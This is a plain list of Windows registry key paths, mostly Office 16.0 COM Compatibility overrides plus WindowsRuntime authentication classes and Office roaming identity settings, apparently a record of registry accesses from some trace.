HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\UseAlternateOutlookAppUserModelId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\CloudFontsVersion
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\DisableExtensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2527171340-3306644326-1278290521-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivateOnHostFlags
HKEY_USERS\.default\Software\Microsoft\IdentityCRL\AppData\appid=00000000480728C5&clientid=00000000480728C5\FirstParty
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\Knowledge
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\Placeholder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\Reset
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
